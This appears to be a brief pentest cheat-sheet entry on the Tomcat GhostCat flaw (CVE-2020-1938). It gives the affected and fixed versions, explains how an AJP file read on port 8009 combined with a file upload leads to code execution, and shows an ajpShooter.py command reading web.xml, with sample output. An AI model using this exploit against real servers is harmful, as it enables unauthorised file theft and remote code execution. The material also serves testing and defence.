Tomcat - CVE-2020-1938 / CVE-2020-10487

Also known as GhostCat.

Affected Versions and Fixed Version [1]

Apache Version	Affected Release Versions	Fixed Version
Apache Tomcat 9	9.0.30 and below	9.0.31
Apache Tomcat 8	8.5.50 and below	8.5.51
Apache Tomcat 7	7.0.99 and below	7.0.100

The vulnerability exists when the conditions of RCE are met:

Web applications need to allow files to be uploaded and stored in web applications. Otherwise, attackers will have to control the content of web applications in some way. This situation, together with the ability to process files as JSPS (through vulnerabilities), will make rce possible.

1. Through ghostcat vulnerability, an attacker can read any file in the webapp directory deployed under Tomcat by using the AJP connection which is usually found on port 8009.

2. At the same time, if this application has upload function in the website service, the attacker can also upload a malicious file containing JSP code to the server (upload file can be any type, image, plain text file, etc.), and then use ghostcat to include the file, so as to achieve the harm of code execution.

The script ajpShooter.py can be used for RCE.

$ python3 ajpShooter.py http://127.0.0.1:8080/demo 8009 /WEB-INF/web.xml read

       _    _         __ _                 _
      /_\  (_)_ __   / _\ |__   ___   ___ | |_ ___ _ __
     //_\\ | | '_ \  \ \| '_ \ / _ \ / _ \| __/ _ \ '__|
    /  _  \| | |_) | _\ \ | | | (_) | (_) | ||  __/ |
    \_/ \_// | .__/  \__/_| |_|\___/ \___/ \__\___|_|
         |__/|_|
                                                00theway,just for test
                                            
[<] 200 OK
[... snip ...]
<?xml version"1.0" encoding="UTF-8"?>
...